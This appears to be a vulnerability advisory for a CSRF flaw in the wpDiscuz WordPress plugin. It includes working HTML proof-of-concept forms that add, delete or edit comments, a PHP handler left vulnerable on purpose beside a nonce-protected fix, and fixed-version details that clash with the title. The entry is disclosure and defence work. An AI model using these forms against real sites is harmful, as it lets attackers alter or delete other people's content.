
WordPress Plugin Vulnerabilities

wpDiscuz < 7.3.4 - Arbitrary Comment Addition/Edition/Deletion via CSRF

Description

The plugin does not check for CSRF when adding, editing and deleting comments. This could allow an attacker to make a logged-in user, such as an admin, edit or delete an arbitrary comment, or make the user who wrote a comment edit it, via a CSRF attack. An attacker could also make a logged-in user post an arbitrary comment.

Other affected actions: wpdCloseThread (to close/open threads) and wpdStickComment (to stick/unstick a comment).

Proof of Concept

To make the logged in user add a comment
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdAddComment" />
      <input type="hidden" name="wc_comment" value="Comment added via CSRF" />
      <input type="hidden" name="submit" value="Post Comment" />
      <input type="hidden" name="wpdiscuz_unique_id" value="dummy" />
      <input type="hidden" name="postId" value="811" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


To delete a comment (CSRF against an admin)
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdDeleteComment" />
      <input type="hidden" name="id" value="27" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


To edit a comment (CSRF against user who made the comment or an admin to modify any comment)
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdSaveEditedComment" />
      <input type="hidden" name="commentId" value="6" />
      <input type="hidden" name="wc_comment" value="Attacker CSRF" />
      <input type="hidden" name="postId" value="811" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html> 
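The root cause is an admin-ajax handler that trusts the session cookie alone. As an added illustration that is not wpDiscuz code, the following shows a hypothetical comment-adding handler in the vulnerable shape next to the fixed shape, where the request must carry a WordPress nonce verified with check_ajax_referer() and the caller's capability is checked; the action names, nonce action string and script handle are assumptions.

```php
<?php
// Added example, not the plugin's own code. Hypothetical action names.

// VULNERABLE shape: any POST from a logged-in browser is accepted, so a form
// on a third-party site can submit this action with the victim's cookies.
add_action( 'wp_ajax_example_add_comment_vuln', function () {
    $post_id = (int) ( $_POST['postId'] ?? 0 );
    $content = wp_kses_post( wp_unslash( $_POST['wc_comment'] ?? '' ) );
    $user    = wp_get_current_user();
    wp_insert_comment( array(
        'comment_post_ID'      => $post_id,
        'comment_content'      => $content,
        'user_id'              => $user->ID,
        'comment_author'       => $user->display_name,
        'comment_author_email' => $user->user_email,
    ) );
    wp_send_json_success();
} );

// FIXED shape: the request must include a nonce bound to this action and to the
// user's session. A forged cross-site form cannot know it, so the handler dies
// with HTTP 403 before touching any data.
add_action( 'wp_ajax_example_add_comment', function () {
    check_ajax_referer( 'example_add_comment', 'nonce' ); // dies on failure
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'not logged in', 401 );
    }
    $post_id = (int) ( $_POST['postId'] ?? 0 );
    $content = wp_kses_post( wp_unslash( $_POST['wc_comment'] ?? '' ) );
    $user    = wp_get_current_user();
    wp_insert_comment( array(
        'comment_post_ID'      => $post_id,
        'comment_content'      => $content,
        'user_id'              => $user->ID,
        'comment_author'       => $user->display_name,
        'comment_author_email' => $user->user_email,
    ) );
    wp_send_json_success();
} );

// Same pattern for destructive actions: nonce first, then a per-object
// capability check so a user can only delete comments they may edit.
add_action( 'wp_ajax_example_delete_comment', function () {
    check_ajax_referer( 'example_delete_comment', 'nonce' );
    $id = (int) ( $_POST['id'] ?? 0 );
    if ( ! current_user_can( 'edit_comment', $id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    wp_delete_comment( $id, true );
    wp_send_json_success();
} );

// Hand the nonce to the page's JavaScript (assumes a script handle 'example-comments').
add_action( 'wp_enqueue_scripts', function () {
    wp_localize_script( 'example-comments', 'exampleAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'example_add_comment' ),
    ) );
} );
```

On the detection side, POSTs to admin-ajax.php for these actions that carry no nonce field, or whose Referer/Origin is a foreign site, are the signal to look for in web server logs.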

Affects Plugins

wpdiscuz
Fixed in version 7.3.2

References

CVE
CVE-2021-24806


Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter twitter
tomorrowisnew_
Verified

Yes

WPVDB ID
2746101e-e993-42b9-bd6f-dfd5544fa3fe

Timeline

Publicly Published

2021-10-11 (about 1 year ago)

Added

2021-10-11 (about 1 year ago)

Last Updated

2022-04-08 (about 11 months ago)
